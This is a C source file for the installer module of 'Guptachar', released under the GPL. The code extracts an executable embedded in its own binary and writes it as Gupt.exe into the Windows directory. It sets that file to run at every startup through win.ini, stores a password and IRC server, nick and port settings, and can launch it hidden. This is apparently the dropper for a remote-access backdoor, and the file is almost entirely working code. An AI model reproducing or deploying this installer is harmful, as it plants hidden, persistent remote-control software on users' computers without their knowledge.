/****************************************************************************

    Guptachar Quick Installation Program
    Copyright (C) 2001 Ayan Chakrabarti

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

    MODUlE.C
    ========
    The QuickInstaller module

****************************************************************************/

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
#include <string.h>
#include "qinst.h"

const unsigned long mysize = 24576;
const unsigned long gsize = 34816;

int main(int argc,char ** argv)
{
        FILE * fp, *fp2;
        char buf[256],buf2[256], fn[1024];
        unsigned long i;
        iinfo inf;

        fp = fopen(argv[0],"rb");

        if(!fp)
                return 1;
        fseek(fp,mysize,0);

        GetWindowsDirectory(fn,1000);
        strcat(fn,"\\Gupt.exe");

        fp2 = fopen(fn,"wb");

        if(!fp2)
        {
                fclose(fp);
                return 1;
        }

        for(i = 0;i < gsize;i++)
                fputc(fgetc(fp),fp2);
        fclose(fp2);

        fread(&inf,sizeof(inf),1,fp);
        fclose(fp);

        WriteProfileString("windows","run",fn);
        WriteProfileString("GSRV","pwdid",inf.pwdid);

        if(inf.isirc)
        {
                strcpy(buf,"1");
                itoa(inf.iport,buf2,10);
        }
        else
                strcpy(buf,"0");

        WriteProfileString("GSRV","isirc",buf);
        if(inf.isirc)
        {
                WriteProfileString("GSRV","inick",inf.inick);
                WriteProfileString("GSRV","ihost",inf.ihost);
                WriteProfileString("GSRV","iport",buf2);
        }

        if(inf.isrun)
                WinExec(fn,0);

        return 0;
}
